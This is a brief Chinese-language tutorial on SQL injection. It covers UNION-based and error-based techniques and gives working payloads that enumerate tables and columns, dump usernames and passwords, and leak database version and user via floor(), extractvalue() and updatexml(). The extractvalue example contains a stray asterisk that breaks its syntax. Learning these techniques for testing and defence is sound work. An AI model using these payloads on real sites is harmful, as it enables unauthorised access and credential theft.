报错注入原理 根据注入位置数据类型可将SQl注入分为两类:数字型和字符型。 例如: 数字型:select * from table where id=用户id 字符型:select * from table where id=‘用户id’ 通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URl中是否存在注入点。
构造payload让信息通过错误提示回显出来。 应用场景:查询不回显内容,会打印错误信息 update、insert等语句,会打印错误信息
此时可以利用order by判断字段数。
SQL union操作符 union操作符用于合并两个或多个select语句的结果集 注意:union内部的select语句必须拥有相同的数量的列,列也必须拥有相似的数据类型。同时,每条select语句中的列的顺序必须相同。 默认情况下,union操作符选取不同的值。如果允许重复的值,请使用union all. union注入应用场景: 1、只有最后一个select子语句允许有order by 2、只有最后一个select子语句允许有limit 3、只要union连接的几个查询的字段数一样并且列的数据类型转换没有问题,就可以查询出结果。 4、注入页面有回显。 利用union select 联合查询,获取表名。 0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 利用union select 联合查询,获取字段名。 0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+ 利用union select 联合查询,获取字段值 0’ union select 1,group_concat(username,0x3a,password),3 from users --+
报错注入方法 凡是可以让错误信息显示的函数(语句),都能实现报错注入,例如: floor() |select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)); group by 对rand函数进行操作时产生错误 concat: 连接字符串功能 floor: 取float的整数值 rand: 取0-1之间随机浮点数 group by: 根据一个或多个列表结果集进行分组并有排序功能。
extractvalue() extractvalue(1,concat*(0x7e,(select user()),0x7e)) XPATH语法错误产生报错 updatexml() select updatexml(1,concat(0x7e,(select user()),0x7e),1) XPATH语法错误产生报错。
